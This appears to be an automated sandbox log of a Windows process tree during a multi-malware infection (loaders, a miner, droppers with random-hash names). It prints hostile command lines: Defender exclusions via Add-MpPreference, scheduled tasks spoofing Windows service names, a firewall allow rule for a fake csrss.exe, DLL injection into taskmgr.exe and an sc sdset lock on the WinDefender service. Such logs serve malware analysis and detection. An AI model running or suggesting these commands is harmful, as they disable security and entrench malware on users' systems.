C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:5124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
4⤵
PID:6056

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:8052

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7560

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7392

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:6392

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7304

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9519" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7204

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk1657" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7212

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk50" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:2124

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk4860" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5136

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5904

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:5964

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:7620

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
PID:8428

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
2⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\is-L3QCG.tmp\tuc6.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L3QCG.tmp\tuc6.tmp" /SL5="$40280,4302127,566784,C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
3⤵
PID:5864

C:\Users\Admin\AppData\Local\Temp\Files\windows.exe
"C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"
2⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\Files\up.exe
"C:\Users\Admin\AppData\Local\Temp\Files\up.exe"
2⤵
PID:5612

C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe
"C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe"
2⤵
PID:7260

C:\Users\Admin\AppData\Local\Temp\ghoul.exe
"C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
3⤵
PID:8464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
PID:8752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
4⤵
PID:2012

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
5⤵
- Creates scheduled task(s)
PID:6548

C:\Users\Admin\AppData\Local\Temp\Files\288cccc47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\Files\288cccc47bbc1871b439df19ff4df68f076.exe"
2⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
3⤵
PID:8764

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
4⤵
PID:8952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
5⤵
PID:2044

C:\Windows\SysWOW64\chcp.com
chcp 1251
6⤵
PID:8260

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
6⤵
PID:7880

C:\Users\Admin\AppData\Local\Temp\nsiA44C.tmp
C:\Users\Admin\AppData\Local\Temp\nsiA44C.tmp
4⤵
PID:1892

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
3⤵
PID:9048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 500
4⤵
- Program crash
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 504
4⤵
- Program crash
PID:8924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 520
4⤵
- Program crash
PID:9164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 696
4⤵
- Program crash
PID:7996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 732
4⤵
- Program crash
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 832
4⤵
- Program crash
PID:5764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 764
4⤵
- Program crash
PID:8656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 788
4⤵
- Program crash
PID:8692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 652
4⤵
- Program crash
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 924
4⤵
- Program crash
PID:8324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 780
4⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 972
4⤵
- Program crash
PID:8256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 980
4⤵
- Program crash
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 896
4⤵
- Program crash
PID:7908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:8868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 928
4⤵
- Program crash
PID:8796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 648
4⤵
- Program crash
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 792
4⤵
- Program crash
PID:8616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 768
4⤵
- Program crash
PID:8704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 732
4⤵
- Program crash
PID:8264

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
4⤵
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 368
5⤵
- Program crash
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 672
5⤵
- Program crash
PID:7080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 672
5⤵
- Program crash
PID:6496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 748
5⤵
- Program crash
PID:7212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 756
5⤵
- Program crash
PID:7224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 788
5⤵
- Program crash
PID:9064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:8504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 660
5⤵
- Program crash
PID:8420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 488
5⤵
- Program crash
PID:8932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 484
5⤵
- Program crash
PID:8900

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:564

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:9136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:5828

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 500
6⤵
- Program crash
PID:6416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 516
6⤵
- Program crash
PID:7380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 544
6⤵
- Program crash
PID:6908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 640
6⤵
- Program crash
PID:6952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 748
6⤵
- Program crash
PID:6604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 732
6⤵
- Program crash
PID:6644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 748
6⤵
- Program crash
PID:6276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 776
6⤵
- Program crash
PID:6508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 804
6⤵
- Program crash
PID:5820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:6452

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
PID:7768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 660
6⤵
- Program crash
PID:8892

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:2820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 952
6⤵
- Program crash
PID:840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 968
6⤵
- Program crash
PID:6772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 996
6⤵
- Program crash
PID:7548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1016
6⤵
- Program crash
PID:5800

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
PID:2588

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:8892

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
PID:9004

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:332

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:8548

C:\Users\Admin\AppData\Local\Temp\tuc4.exe
"C:\Users\Admin\AppData\Local\Temp\tuc4.exe"
3⤵
PID:3408

C:\Users\Admin\AppData\Local\Temp\is-OQ6P1.tmp\tuc4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OQ6P1.tmp\tuc4.tmp" /SL5="$40364,4603451,54272,C:\Users\Admin\AppData\Local\Temp\tuc4.exe"
4⤵
PID:8500

C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe
"C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe" -i
5⤵
PID:888

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 1131
5⤵
PID:8844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 1131
6⤵
PID:3600

C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe
"C:\Users\Admin\AppData\Local\AVI formatter tool\aviformattertool.exe" -s
5⤵
PID:9040

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
2⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
"C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
3⤵
PID:5348

C:\Users\Admin\AppData\Local\Temp\ARA.exe
"C:\Users\Admin\AppData\Local\Temp\ARA.exe"
4⤵
PID:7356

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"
5⤵
PID:5708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "
6⤵
PID:8732

C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
"C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
7⤵
PID:8592

C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe
"C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe"
8⤵
PID:9088

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\Files\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Installer.exe"
2⤵
PID:2176

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5424

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:888

C:\Users\Admin\AppData\Local\Temp\Files\TierDiagnosis.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TierDiagnosis.exe"
2⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\Files\miner.exe
"C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"
2⤵
PID:6612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\miner.exe'; Add-MpPreference -ExclusionProcess 'miner'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
3⤵
PID:6784

C:\Users\Admin\AppData\Local\Temp\Files\build.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
2⤵
PID:7248

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004E4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1484 -ip 1484
1⤵
PID:4336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff897833cb8,0x7ff897833cc8,0x7ff897833cd8
1⤵
PID:2880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff897833cb8,0x7ff897833cc8,0x7ff897833cd8
1⤵
PID:3568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff897833cb8,0x7ff897833cc8,0x7ff897833cd8
1⤵
PID:896

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2780

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1988

C:\Windows\SysWOW64\chcp.com
chcp 1251
1⤵
PID:5124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
1⤵
PID:6056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8917d9758,0x7ff8917d9768,0x7ff8917d9778
1⤵
PID:3520

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
1⤵
PID:6872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.0.234466807\604262955" -parentBuildID 20221007134813 -prefsHandle 1744 -prefMapHandle 1728 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0751edd5-d0d7-4927-b24b-809b7ff54c92} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 1848 135a6d07758 gpu
2⤵
PID:6080

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.1.1039058130\1387024450" -parentBuildID 20221007134813 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 21563 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98c8c03c-8cb0-4f35-8eda-ec6234a58b70} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 2288 135a58eda58 socket
2⤵
PID:1940

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.2.363690350\2066948561" -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3084 -prefsLen 21601 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5472e6fc-09f2-4da5-99b5-11378a4ae8b0} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 3136 135aa8b2958 tab
2⤵
PID:3932

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.3.441768046\2045661332" -childID 2 -isForBrowser -prefsHandle 3672 -prefMapHandle 3668 -prefsLen 26064 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5391c7a9-f666-4c2d-b3f6-2b383bc1cfa4} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 3684 13599a61c58 tab
2⤵
PID:5896

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.6.1898365515\184347213" -childID 5 -isForBrowser -prefsHandle 5124 -prefMapHandle 5128 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82af3217-3738-4cc0-89b2-4c0fdd09b42b} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 4808 135acff0058 tab
2⤵
PID:7664

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.5.607140836\669858525" -childID 4 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0f34f88-8a55-47f2-b08a-d8ffb2ae0b62} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 5008 135acfef458 tab
2⤵
PID:7656

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.4.1623342833\1706309548" -childID 3 -isForBrowser -prefsHandle 4776 -prefMapHandle 4220 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5eebe02b-e3d5-4389-a11d-81bdce5c02f4} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 4792 135ab3eb458 tab
2⤵
PID:7644

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.8.976408381\1647943945" -childID 7 -isForBrowser -prefsHandle 4960 -prefMapHandle 4956 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {927c7268-fb5e-48e5-91a5-0f1d8b7b1087} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 4968 135ad96fe58 tab
2⤵
PID:8108

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.7.274971503\745648296" -childID 6 -isForBrowser -prefsHandle 5512 -prefMapHandle 5508 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b70f74c8-cfa2-4ecb-9176-a0ac18767123} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 5520 135ad96f858 tab
2⤵
PID:8100

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.9.1552088782\1400342802" -parentBuildID 20221007134813 -prefsHandle 6040 -prefMapHandle 6036 -prefsLen 26379 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7387ede4-8e15-47bb-8f1b-427cd589512c} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 6052 135adc68258 rdd
2⤵
PID:6496

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.10.1462183097\52854114" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 6180 -prefMapHandle 6176 -prefsLen 26379 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d81dcf89-14bd-4d8f-91c2-6ab447c4577f} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 6188 135ae816558 utility
2⤵
